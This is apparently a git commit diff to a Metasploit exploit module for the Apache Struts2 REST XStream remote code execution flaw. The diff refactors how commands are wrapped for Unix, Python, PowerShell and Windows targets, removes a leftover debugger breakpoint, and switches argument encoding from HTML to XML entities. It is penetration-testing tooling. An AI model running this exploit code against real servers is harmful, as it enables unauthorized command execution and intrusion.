Assign cmd to entire case and use encode for XML

Hat tip @acammack-r7. Forgot about that first syntax!
2017-09-07 19:08:37 -05:00 · 2017-09-07 19:08:37 -05:00 · a9a307540f
parent 8f1e353b6e
commit a9a307540f
1 changed files with 7 additions and 9 deletions
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@ -86,21 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
  #

  def execute_command(cmd, opts = {})
-    case target.name
+    cmd = case target.name
    when /Unix/, /Linux/
-      cmd = %W{/bin/sh -c #{cmd}}
+      %W{/bin/sh -c #{cmd}}
    when /Python/
-      cmd = %W{python -c #{cmd}}
+      %W{python -c #{cmd}}
    when /PowerShell/
-      # This shit doesn't work yet
-      require 'pry'; binding.pry
-      cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
    when /Windows/
-      cmd = %W{cmd.exe /c #{cmd}}
+      %W{cmd.exe /c #{cmd}}
    end

-    # Encode each command argument with HTML entities
-    cmd.map! { |arg| Rex::Text.html_encode(arg) }
+    # Encode each command argument with XML entities
+    cmd.map! { |arg| arg.encode(xml: :text) }

    res = send_request_cgi(
      'method' => 'POST',